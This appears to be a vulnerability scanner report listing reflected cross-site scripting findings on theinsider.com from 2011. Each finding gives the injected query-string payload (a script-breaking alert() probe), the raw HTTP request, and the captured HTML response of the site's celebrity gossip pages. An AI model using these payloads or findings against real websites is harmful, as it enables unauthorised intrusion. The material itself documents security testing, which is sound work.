beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/search;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/search;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/search;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Search+Page+http://insdr.co/taSort+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /><style type="text/css"> .gsc-control-cse { font-family: Arial, sans-serif; border-color: #FFFFFF; background-color: #FFFFFF; } input.gsc-input { border-color: #777777; } input.gsc-search-button { border-color: #333333; background-color: #333333; } .gsc-tabHeader.gsc-tabhInactive { border-color: #777777; background-color: #777777; } .gsc-tabHeader.gsc-tabhActive { border-color: #333333; background-color: #333333; } .gsc-tabsArea { border-color: #333333; } .gsc-webResult.gsc-result { border-color: #FFFFFF; background-color: #FFFFFF; } .gsc-webResult.gsc-result:hover { border-color: #000000; background-color: #FFFFFF; } .gs-webResult.gs-result a.gs-title:link, .gs-webResult.gs-result a.gs-title:link b { color: #444444; } .gs-webResult.gs-result a.gs-title:visited, .gs-webResult.gs-result a.gs-title:visited b { color: #444444; } .gs-webResult.gs-result a.gs-title:hover, .gs-webResult.gs-result a.gs-title:hover b { color: #444444; } .gs-webResult.gs-result a.gs-title:active, .gs-webResult.gs-result a.gs-title:active b { color: #777777; } .gsc-cursor-page { color: #444444; } a.gsc-trailing-more-results:link { color: #444444; } .gs-webResult .gs-snippet { color: #333333; } .gs-webResult div.gs-visibleUrl { color: #000000; } .gs-webResult div.gs-visibleUrl-short { color: #000000; } .gs-webResult div.gs-visibleUrl-short { display: none; } .gs-webResult div.gs-visibleUrl-long { display: block; } .gsc-cursor-box { border-color: #FFFFFF; } .gsc-results .gsc-cursor-page { border-color: #777777; background-color: #FFFFFF; } .gsc-results .gsc-cursor-page.gsc-cursor-current-page { border-color: #333333; background-color: #333333; } .gs-promotion { border-color: #CCCCCC; background-color: #E6E6E6; } .gs-promotion a.gs-title:link, .gs-promotion a.gs-title:link *, .gs-promotion .gs-snippet a:link { color: #0000CC; } .gs-promotion a.gs-title:visited, .gs-promotion a.gs-title:visited *, .gs-promotion .gs-snippet a:visited { color: #0000CC; } .gs-promotion a.gs-title:hover, .gs-promotion a.gs-title:hover *, .gs-promotion .gs-snippet a:hover { color: #444444; } .gs-promotion a.gs-title:active, .gs-promotion a.gs-title:active *, .gs-promotion .gs-snippet a:active { color: #00CC00; } .gs-promotion .gs-snippet, .gs-promotion .gs-title .gs-promotion-title-right, .gs-promotion .gs-title .gs-promotion-title-right * { color: #333333; } .gs-promotion .gs-visibleUrl, .gs-promotion .gs-visibleUrl-short { color: #00CC00; }#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px;color:#fff;}.content_container:last-child {border: none;}.art_link {margin-bottom: 15px;}.content_container p {margin-bottom: 0px;}.content_container {padding-bottom: 10px;}.square_excerpt { margin-top: -15px; max-width: 260px; float: right;}.channel_img {max-width: 455px; max-height: 300px; margin: 0 15px;}#channel_title_bar { width: 707px; height: 51px; background-color: #000; margin-left: -5px !important; margin-bottom: 15px; -webkit-box-shadow: 0px 5px 15px black; -moz-box-shadow: 0px 5px 15px black; box-shadow: 0px 5px 15px black;}.channel_name_text { text-align: center; font-family: Futura, "Futura BT", "Century Gothic", Helvetica, "Helvetica Neue", Arial, sans-serif; padding-top: 10px; color:#fff;}#main_content { width: 1010px; padding:0;}#search_wrapper form {display:none !important;}h2.search_header {width:100%;float:left !important;margin:20px 0 10px 0;padding:0;}#cse {width:1000px;float:left !important;overflow:hidden;margin:10px 0;padding:0;}.cse .gsc-control-cse, .gsc-control-cse {padding:0 !important;width:980px;}#full_col {width:990px;overflow:hidden;display:block;margin:0 0 0 15px;padding:0;}</style> <!-- MAIN CONTENT --> <div id="main_content"> <!-- LEFT COLUMN --> <div id="full_col"> <h2 class="search_header">SEARCH RESULTS</h2><div id="cse">Loading</div><script src="http://www.google.com/jsapi" type="text/javascript"></script><script type="text/javascript"> google.load('search', '1', {language : 'en', style : google.loader.themes.MINIMALIST}); google.setOnLoadCallback(function() { var options = {}; options[google.search.Search.RESTRICT_EXTENDED_A..
- /thelook/

/thelook/

http://www.theinsider.com/thelook/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0030E5)%3C/..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0030E5)</script>

Request

GET /thelook/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 07:11:52 GMT
Content-Length: 11054
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="thelook" /> <meta name="date" content="2011-05-13 07:48:00" /><meta property="og:title" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/thelook/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Fashion | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-13 07:48:00" /><Attribute name="sdate" value="20110513" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/thelook;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/thelook;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/thelook;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=The+Look+Channel+Page+http://insdr.co/qFGjxz+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/inc/thelook/thelook.css" type="text/css" /><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/thelook/"><img src="/media/img/channel_page_name_thelook.png" class="channel_title_logo" alt="" /></a> </div> <div class='content_container'><a target='_self' href='/fashion/38519_Two_Looks_One_Star/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/11/99061/victoria_beckham_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/38519_Two_Looks_One_Star/index.html' class='black_text_link horizontal_excerpt'>Two Looks, One Star</a></h4><p></p><a target='_self' href='/fashion/38519_Two_Looks_One_Star/index.html'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/thelook/45412_Olivia_Wilde_s_Perfect_Day_to_Night_Looks/index.html' class='black_text_link'><img class='channel_img even_img' src='/media/photo/2011/10/92901/olivia_wilde_360.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/thelook/45412_Olivia_Wilde_s_Perfect_Day_to_Night_Looks/index.html' class='black_text_link horizontal_excerpt'>Olivia Wilde's Perfect Day to Night Looks</a></h4><p>Olivia Wilde hit up not one, but two, events yesterday, showing us all how to expertly switch it up from a daytime to nighttime look.</p><a target='_self' href='/thelook/45412_Olivia_Wilde_s_Perfect_Day_to_Night_Looks/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/thelook/45405_Miss_Piggy_Limited_Edition_MAC_Collection_Confirmed/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/10/92834/misspiggy_640_maccosmetics.JPG' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/thelook/45405_Miss_Piggy_Limited_Edition_MAC_Collection_Confirmed/index.html' class='black_text_link horizontal_excerpt'>Miss Piggy MAC Collection Confirmed!</a></h4><p>Icon. Actress. Supemodel. Chanteuse. Frog-o-phile.</p><a target='_self' href='/thelook/45405_Miss_Piggy_Limited_Edition_MAC_Collection_Confirmed/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/thelook/45357_Christina_Aguilera_s_Makeup_Pants_Less_Dinner_Date/index.html' class='black_text_link'><img class='channel_img even_img' src='/media/photo/2011/10/92603/christina_aguilera_640_jlac.JPG' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/thelook/45357_Christina_Aguilera_s_Makeup_Pants_Less_Dinner_Date/index.html' class='black_text_link horizontal_excerpt'>Christina Aguilera's Makeup, Pants-Less Dinner</a></h4><p>Christina Aguilera recently hit up Off Vine restaurant in L.A. with boyfriend Matt Rutler, where the pop diva chose to go out without pants <em>or</em> makeup.</p><a target='_self' href='/thelook/45357_Christina_Aguilera_s_Makeup_Pants_Less_Dinner_Date/index.html'>READ</a></div><div class='clearfix'></div></div><div class='content_container'><a target='_self' href='/thelook/45330_What_the_face_Lindsay_Lohan_Part_2/index.html' class='black_text_link'><img class='channel_img odd_img' src='/media/photo/2011/10/92287/lindsay_lohan_640_tcanham_129644764.JPG' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/thelook/45330_What_the_face_Lindsay_Lohan_Part_2/index.html' class='black_text_link horizontal_excerpt'>What the Face, Lindsay Lohan? Part 2</a></h4><p>Let's forget for a..
- /thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/

/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/

http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/?'%22--%3E%3C/sty..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x003125)</script>

Request

GET /thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:11:54 GMT
Content-Length: 13311
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Say What ...?! Tyra Banks Doesn't Shave Her Legs - TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="America's Next Top , say what ...?!, sports illustrated, tyra banks" /> <meta name="category" content="thelook" /> <meta name="date" content="2011-09-08 09:20:00" /><meta property="og:title" content="Say What ...?! Tyra Banks Doesn't Shave Her Legs" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/thelook/44064_Say_What_Tyra_Banks_Doesn_t_Shave_Her_Legs/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/photo/2011/09/86009/tyra_banks_150_fharrison_121157302.jpg" /><meta property="og:description" content="OOOH Miss Tyra! Former supermodel and super full-of-herself personality Tyra Banks has a beauty secret to spill! She doesn't shave her legs. Gross!" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-09-08 09:20:00" /><Attribute name="sdate" value="20110908" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/photo/2011/09/86009/tyra_banks_150_fharrison_121157302.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script type="text/javascript" src="/swfobject.js"></script> <script src="/new_insider/jcapslide.js" type="text/javascript"></script> <link rel="stylesheet" href="/inc/css/insider_phase_2.css" type="text/css" /> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <style> .ins_fb_text { display: block; left: 2px; position: absolute; top: 42px; } .ad_center { margin: 0 auto; width: 728px; } </style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--></head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><!-- TOP LEADERBOARD AD --><div id="leaderboard-top-box"><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
